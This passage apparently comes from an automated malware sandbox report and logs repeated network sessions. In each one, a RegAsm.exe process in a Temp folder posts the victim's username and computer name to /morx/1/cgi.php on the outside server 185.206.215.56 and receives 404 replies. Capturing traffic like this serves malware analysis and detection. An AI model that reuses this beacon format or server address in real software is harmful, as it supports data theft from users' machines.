                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        102192.168.2.2249269185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:47.475682020 CET1276OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:47.558752060 CET1276OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:47.647986889 CET1277INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:46 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        103192.168.2.2249270185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:47.867741108 CET1277OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:47.933981895 CET1278OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:48.042228937 CET1278INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:47 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        104192.168.2.2249271185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:48.254686117 CET1279OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:48.324067116 CET1279OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:48.422138929 CET1279INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:47 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        105192.168.2.2249272185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:48.626007080 CET1280OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:48.699857950 CET1280OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:48.788675070 CET1281INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:47 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        106192.168.2.2249273185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:49.009732008 CET1281OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:49.074176073 CET1282OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:49.170300961 CET1282INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:48 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        107192.168.2.2249274185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:49.377604008 CET1283OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:49.449208975 CET1283OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:49.549511909 CET1283INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:48 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        108192.168.2.2249275185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:49.748266935 CET1284OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:49.824132919 CET1284OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:49.910768986 CET1285INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:49 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        109192.168.2.2249276185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:50.119352102 CET1285OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:50.183672905 CET1285OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:50.275711060 CET1286INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:49 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        11192.168.2.2249178185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:11.686949968 CET1156OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:11.761766911 CET1156OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:11.871412992 CET1157INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:10 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        110192.168.2.2249277185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:50.486913919 CET1287OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:50.558531046 CET1287OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:50.662352085 CET1287INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:49 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        111192.168.2.2249278185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:50.870070934 CET1288OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:50.933485031 CET1288OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:51.028076887 CET1288INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:50 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        112192.168.2.2249279185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:51.234373093 CET1289OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:51.308582067 CET1289OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:51.393172979 CET1290INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:50 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        113192.168.2.2249280185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:51.603753090 CET1291OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:51.667836905 CET1291OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:51.756889105 CET1291INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:50 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        114192.168.2.2249281185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:51.974611998 CET1292OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:52.043278933 CET1292OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:52.147881985 CET1292INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:51 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        115192.168.2.2249282185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:52.356383085 CET1293OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:52.433665037 CET1293OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:52.526789904 CET1294INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:51 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        116192.168.2.2249283185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:52.728532076 CET1294OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:52.808633089 CET1295OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:52.923052073 CET1295INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:51 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        117192.168.2.2249284185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:53.137320995 CET1296OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:53.214835882 CET1296OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:53.310693979 CET1296INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:52 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
